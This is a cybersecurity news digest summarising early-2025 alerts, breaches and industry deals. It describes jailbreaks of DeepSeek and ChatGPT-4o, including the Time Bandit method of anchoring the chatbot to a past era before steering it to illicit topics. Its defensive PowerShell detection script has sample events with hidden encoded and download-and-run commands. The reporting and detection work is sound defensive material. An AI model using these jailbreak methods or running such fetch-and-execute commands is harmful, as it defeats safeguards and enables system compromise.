What are the latest cybersecurity alerts, incidents, and news?
DeepSeek Vulnerabilities, LLMs, Phorpiex Botnet, LockBit Ransomware, Malicious Browser Extensions, Hijack Browsers, Devices, Time Bandit Jailbreak, ChatGPT, OpenAI, Safety Features, Coyote Banking Trojan, Brazilian Banks, Crypto Platforms, Tata Technologies, Ransomware Attack, University of Notre Dame Australia, Tor Project, X Account, Cryptocurrency Scam, AngelSense, Disabled Users, Data Leak, ZAR Rehab Clinics, Germany, US Justice Department, HPE, Juniper, $14B Deal, Competition Concerns, Google AI, Nation-State Groups, Malicious Operations, Microsoft 365, Bug Bounty Program, Tenable, Vulcan Cyber, Exposure Management, AI-Driven Phishing, BEC.
Cyber Alerts
1. DeepSeek LLM Flaws Exposed by Jailbreak
Researchers have uncovered significant vulnerabilities in DeepSeek's large language models (LLMs), specifically DeepSeek-R1, through advanced jailbreaking methods. The techniques used, "Bad Likert Judge", "Crescendo" and "Deceptive Delight", show how readily the models' safety guardrails can be bypassed to produce harmful output. By steering the models through these multi-turn prompts, the researchers were able to obtain restricted content and working malicious code, including keyloggers and data exfiltration scripts.
2. Phorpiex Powers LockBit Ransomware Attacks
Cybereason's latest threat analysis documents the resurgence of the Phorpiex botnet, which is now being used to deliver LockBit ransomware. This marks a notable shift in tactics: Phorpiex automates the deployment of LockBit on each infected host, without the hands-on lateral movement that usually precedes a ransomware detonation, which makes the operation faster and harder to spot. Historically used for spam campaigns and cryptocurrency mining, Phorpiex's new role in ransomware distribution highlights its evolving capabilities.
3. Malicious Extensions Allow Device Hijacking
SquareX has disclosed a new attack technique, dubbed browser syncjacking, that uses a malicious browser extension to take full control of a victim's browser and device with minimal user interaction. The extension, typically disguised as a productivity tool, needs only the read/write permissions that users routinely grant. Once installed, it silently signs the victim into a Chrome profile managed by the attacker; from that foothold the attacker escalates to a full browser takeover, hijacking the profile and harvesting stored credentials, and can then extend control to the underlying device.
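The practical check that follows from this item is an inventory of which installed extensions already hold the "read and change all your data on all websites" footprint the technique relies on. The script below is an added example written for this page, not SquareX's tooling: it audits Chrome extension manifests (the constructed BENIGN and SUSPECT manifests are illustrative, the permission and host-pattern lists are a starting set, and the Windows profile path is the default location, all assumptions to adjust for your fleet).

```python
"""Audit Chrome extension manifests for the permission footprint a
profile-hijacking extension relies on. Added example, not SquareX's own code."""
import json
from pathlib import Path
from urllib.parse import urlparse

# Match patterns that grant read/write access to every site the user visits.
BROAD_HOST_PATTERNS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*", "file:///*"}
# API permissions that reach beyond page content into sessions and the browser itself.
SENSITIVE_API_PERMISSIONS = {
    "cookies", "tabs", "scripting", "webRequest", "declarativeNetRequest",
    "management", "identity", "nativeMessaging", "debugger", "history",
}
# Extensions installed from the Chrome Web Store carry this update host in their manifest.
WEB_STORE_UPDATE_HOST = "clients2.google.com"


def audit_manifest(manifest: dict) -> list[str]:
    """Return human-readable findings for one manifest.json (empty list = nothing broad)."""
    name = manifest.get("name", "<unnamed>")
    perms = set(manifest.get("permissions", []))
    # MV3 lists host patterns under host_permissions; MV2 mixed them into permissions.
    hosts = set(manifest.get("host_permissions", [])) | perms
    # content_scripts "matches" also grant page access, with no separate prompt.
    for script in manifest.get("content_scripts", []):
        hosts |= set(script.get("matches", []))

    findings = []
    broad = hosts & BROAD_HOST_PATTERNS
    if broad:
        findings.append(f"{name}: can read/write every site via {sorted(broad)}")
    risky = perms & SENSITIVE_API_PERMISSIONS
    if risky:
        findings.append(f"{name}: sensitive browser APIs {sorted(risky)}")
    update_url = manifest.get("update_url", "")
    # Heuristic: a missing or non-Web-Store update_url means sideloaded or force-installed.
    if urlparse(update_url).hostname != WEB_STORE_UPDATE_HOST:
        findings.append(f"{name}: not a Web Store install (update_url={update_url!r})")
    return findings


def audit_extensions_dir(extensions_dir: Path) -> dict[str, list[str]]:
    """Walk <profile>/Extensions/<id>/<version>/manifest.json and collect findings per ID."""
    results: dict[str, list[str]] = {}
    for manifest_path in extensions_dir.glob("*/*/manifest.json"):
        ext_id = manifest_path.parent.parent.name
        with open(manifest_path, encoding="utf-8") as fh:
            findings = audit_manifest(json.load(fh))
        if findings:
            results.setdefault(ext_id, []).extend(findings)
    return results


# Constructed sample manifests, not taken from any real extension.
BENIGN = {
    "name": "Word Counter", "manifest_version": 3,
    "permissions": ["storage"], "host_permissions": [],
    "update_url": "https://clients2.google.com/service/update2/crx",
}
SUSPECT = {
    "name": "Productivity Helper", "manifest_version": 3,
    "permissions": ["storage", "tabs", "cookies"],
    "host_permissions": ["<all_urls>"],
    # no update_url: sideloaded or force-installed rather than from the Web Store
}

if __name__ == "__main__":
    for m in (BENIGN, SUSPECT):
        print(audit_manifest(m) or [f"{m['name']}: no broad permissions"])
    # Default profile location on Windows (assumption); adjust for macOS/Linux or other profiles.
    chrome_ext = Path.home() / "AppData/Local/Google/Chrome/User Data/Default/Extensions"
    if chrome_ext.is_dir():
        for ext_id, findings in audit_extensions_dir(chrome_ext).items():
            print(ext_id, *findings, sep="\n  ")
```

The point of the update_url check is that the syncjacking chain starts with getting the extension onto the machine; an extension that was never served by the Web Store deserves a second look even before its permissions are weighed.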
4. Time Bandit Flaw Bypasses ChatGPT Safety
The "Time Bandit" jailbreak in OpenAI's ChatGPT-4o allows attackers to bypass the model's built-in safety controls. Exploiting it, an attacker can steer the chatbot into producing dangerous content such as malware-creation instructions and phishing lures. The flaw works by anchoring the conversation to a specific historical time period and then gradually steering it toward illicit subjects without triggering the safety guidelines.
5. Coyote Trojan Targets Brazilian Banks
Cybersecurity researchers have uncovered a new wave of attacks using the Coyote banking Trojan, which specifically targets financial institutions in Brazil. The campaign uses Windows shortcut (LNK) files that launch PowerShell scripts, starting a multi-stage infection chain that ends in data theft and system compromise. The Trojan's capabilities include keylogging, screenshot capture and phishing overlays that mimic banking interfaces, and its use of less common tooling such as Nim and Node.js helps it evade detection.
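The LNK-to-PowerShell first stage is the part of this chain a defender can watch for in process-creation telemetry. The script below is an added detection example written for this page (not Fortinet's analysis code and not the Coyote operators' tooling): it scores Sysmon-style process-creation events for PowerShell launched the way a shortcut lure launches it. The parent-of-explorer.exe heuristic, the indicator weights, the alert threshold and the SAMPLE_EVENTS records are all constructed assumptions for illustration.

```python
"""Score process-creation events for PowerShell launched the way an LNK lure
launches it. Added detection example; not Fortinet's or the Coyote operators' code."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal shape of a Sysmon Event ID 1 / EDR process-creation record."""
    parent_image: str
    image: str
    command_line: str


# (pattern, weight, label). Weights are an assumption for this example:
# a shortcut lure usually needs a hidden window plus an encoded or downloaded payload.
INDICATORS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), 3, "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), 3, "encoded command"),
    (re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I), 2, "execution policy bypass"),
    (re.compile(r"-(?:nop|noprofile)\b", re.I), 1, "profile suppressed"),
    (re.compile(r"iex\b|invoke-expression|downloadstring|invoke-webrequest|\biwr\b|net\.webclient", re.I),
     3, "download-and-run"),
]
ALERT_THRESHOLD = 4  # assumption: tune against your own baseline


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, matched indicator labels) for one event; 0 for non-PowerShell images."""
    if basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    score, hits = 0, []
    # A double-clicked .lnk runs its target as a child of explorer.exe.
    if basename(ev.parent_image) == "explorer.exe":
        score += 2
        hits.append("spawned by explorer.exe (shortcut launch)")
    for pattern, weight, label in INDICATORS:
        if pattern.search(ev.command_line):
            score += weight
            hits.append(label)
    return score, hits


def detect(events: list[ProcessEvent]) -> list[tuple[ProcessEvent, int, list[str]]]:
    """Return the events whose score reaches ALERT_THRESHOLD, with their evidence."""
    alerts = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append((ev, score, hits))
    return alerts


# Constructed sample events (paths and payloads are illustrative, not real telemetry).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -w hidden -nop -ep bypass -enc SQBFAFgAIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAA="),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -Command \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')\""),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Process"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe notes.txt"),
]

if __name__ == "__main__":
    for ev, score, hits in detect(SAMPLE_EVENTS):
        print(f"[score {score}] {ev.command_line}\n    " + ", ".join(hits))
```

The scoring keeps a plain admin invocation (`-NoProfile -Command Get-Process` from cmd.exe) below the threshold while the hidden-window, encoded and download-and-run forms clear it; in production the weights belong in a rule you can tune rather than in code.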
Cyber Incidents
6. Tata Technologies Investigates Cyberattack
Tata Technologies Limited has disclosed that it fell victim to a ransomware attack that impacted certain IT assets. The Pune, India-headquartered company said the attack forced the temporary suspension of some of its IT services, but assured stakeholders that its core client delivery services remained fully operational and unaffected. The company notified the Bombay Stock Exchange (BSE) and the National Stock Exchange of India (NSE) of the incident in a statement dated January 31, 2025, and said it is taking the matter seriously.
7. University of Notre Dame Faces Cyberattack
The University of Notre Dame Australia is currently investigating a cyberattack that has targeted its systems. The university has expressed its commitment to securing its infrastructure, stating that it is prioritizing the investigation and collaborating with government agencies like the Australian Cyber Security Centre. The university has assured its community, including staff and students, that updates will follow as the situation develops.
8. Tor Project X Account Hacked to Promote Scam
The Tor Project's official X account was compromised on January 30, 2025, leading to the promotion of a fraudulent cryptocurrency scheme. The organization quickly issued a warning across other platforms, urging followers not to engage with any posts or links from the hacked account. As efforts to regain control of the account continue, the Tor Project emphasizes the importance of verifying information through official channels and staying cautious of phishing scams.
9. AngelSense Exposes Sensitive Data Online
AngelSense, a company providing assistive technology for people with disabilities, recently exposed the personal and sensitive information of its users to the open internet. Researchers from the security firm UpGuard alerted the company to the vulnerability, which had left a database unprotected and accessible through the internet. The exposed data included names, phone numbers, addresses, GPS coordinates, and sensitive health information, such as conditions like autism and dementia, all accessible without any password protection.
10. ZAR Rehab Data Leak Exposes Sensitive Data
A massive data leak at ZAR rehab clinics in Germany exposed highly sensitive patient information. The issue stemmed from the ZAR PAT app, which lacked transport encryption, allowing patient data, including medical reports and personal information, to be accessed in plain text. The breach affected hundreds of thousands of patients and exposed data such as names, birthdates, and detailed medical reports. The leak was discovered when a user of the app noticed the unencrypted data transmission and reported it to authorities.
Cyber News
11. DOJ Moves to Block HPE Juniper Merger Deal
The Justice Department's unexpected lawsuit against Hewlett Packard Enterprise's (HPE) $14 billion acquisition of Juniper Networks marks the first such challenge under the new Trump administration. The department argues that combining the two companies would stifle competition and reduce innovation, which could ultimately lead to higher prices for customers. HPE and Juniper, however, have strongly opposed the move, claiming the merger would foster greater competition and offer customers more innovation and choice within the networking market.
12. AI Fuels Cyberattacks by 57+ Threat Groups
Over 57 threat actors from nations including China, Iran, North Korea, and Russia have been observed using Google's AI tools to support their cyber operations. According to Google's Threat Intelligence Group (GTIG), the AI is mainly used for research, code troubleshooting, and creating content for malicious campaigns. Iranian APT42, the most active user of Gemini, uses it for tasks like crafting phishing attacks and researching targets in the defense sector.
13. Microsoft Updates 365 Bug Bounty Program
Microsoft has announced significant updates to its Microsoft 365 Bug Bounty Program, now offering rewards between $500 and $27,000 for identifying critical vulnerabilities. The program invites global security researchers to submit vulnerabilities in services such as Office 365 and Microsoft Accounts. Researchers can earn increased bonuses for high-impact issues, including remote code execution or cross-tenant data leakage, with additional incentives for submissions made during special events like the "Zero Day Quest."
14. Tenable Acquires Vulcan Cyber for $150M
Tenable has announced the acquisition of exposure management company Vulcan Cyber for $150 million. This strategic move is expected to close in the first quarter of 2025 and will significantly enhance Tenable's exposure management platform. With Vulcan's integration, Tenable will offer advanced AI capabilities, better risk prioritization, and automated remediation workflows, empowering customers to manage cyber risks more effectively and gain a comprehensive view of their security landscape.
15. Nine out of Ten Emails Were Spam in 2024
A recent report from VIPRE Security Group highlights the growing threat of AI-driven phishing and business email compromise (BEC) campaigns. With 9 out of 10 emails classified as spam globally in 2024, cybercriminals increasingly rely on sophisticated tactics, including word-perfect AI-generated phishing emails, subtle BEC scams, and well-crafted ploys that impersonate trusted vendors. The analysis, which covers 7.2 billion emails globally, reveals that 37% of spam emails were commercial, 32% were scams, and 21% were phishing attempts, underscoring the need for stronger defenses.
Copyright © 2025 CyberMaterial. All Rights Reserved.